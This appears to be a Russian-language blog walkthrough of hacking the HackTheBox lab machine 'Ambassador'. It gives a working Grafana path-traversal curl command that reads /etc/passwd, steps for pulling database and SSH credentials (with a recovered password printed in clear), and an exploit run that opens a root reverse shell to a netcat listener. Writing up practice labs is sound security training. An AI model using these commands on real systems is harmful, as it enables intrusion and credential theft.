About Teletype
Join
@faust_1st
January 10, 2023

Взлом машины Ambassador на платформе HackTheBox

Первым делом сканируем порты:

nmap 10.10.11.183

Посмотрев на порт 3000 мы вставляем его в поиск и переходим на сайт с пользовательскими данными:

После я начал искать экплойты для Grafana, я перешёл в metasploit и нашёл один эксплойт для чтения файлов.

Так же можно узнать, что он делает и узнать это можно с помощью команды curl, дабы прочитать наш файл /etc/passwd и увидеть в нём некоторые данные, для этого используем команду:

curl -s --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../etc/passwd | grep sh$

Где 10.10.11.183 - IP жертвы.

Теперь мы сможем загрузить базу данных grafana db

Теперь открываем её с помощью команды: sqlitebrowser grafana.db

После просматриваем таблицу data_source

Просматривая таблицу, мы находим учетные данные для mysql

Теперь подключаемся по найденым нами данным и видим базы данных, для нас главная - whackywidget. Будем использовать её.

Дальше ищем таблицу пользователей и видим, что там есть разработчик и его хэш

Данный хэш можем расшифровать на любых сайтах base64 decode

Расшифровка дала нам информацию - anEnglishManInNewYork027468 . Теперь подключаемся к ssh и сразу находим там флаг user.txt

ssh [email protected]
password - anEnglishManInNewYork027468

Дальше изучив директории, переходим в папку /opt/my-app где мы видим проект GitHub и основную информацию о нём

Проверив все коммиты, можем заметить, что на 33a53ef был удалён токен. Он выделен красным.

Дальше будем использовать эксплойт из GitHub'a

который мы будем использовать для масштабирования

Копируем его на компьютер жертвы

На нашем локальном сервере лежит папка с нашим эксплойтом - exploit.py

Загружая эксплойт на компьютер жертвы, мне не удалось это сделать в папке с проектом из Github, так что переходим во временную папку /tmp и загружаем оттуда.

Перед запуском эксплойта меняем lhost на свой

python3 exploit.py --lhost 10.10.14.10 --lport 443 --token bb03b43b-1d81-d62b-24b5-39540ee469b5

Теперь можно запустить наш прослушиватель netcat, где у нас будет оболочка пользователя root

sudo netcat -lvnp 443

Теперь найденные флаги отправляем на сайт и готово

My profile

@faust_1st
January 10, 2023, 21:24
0 reactions
0 views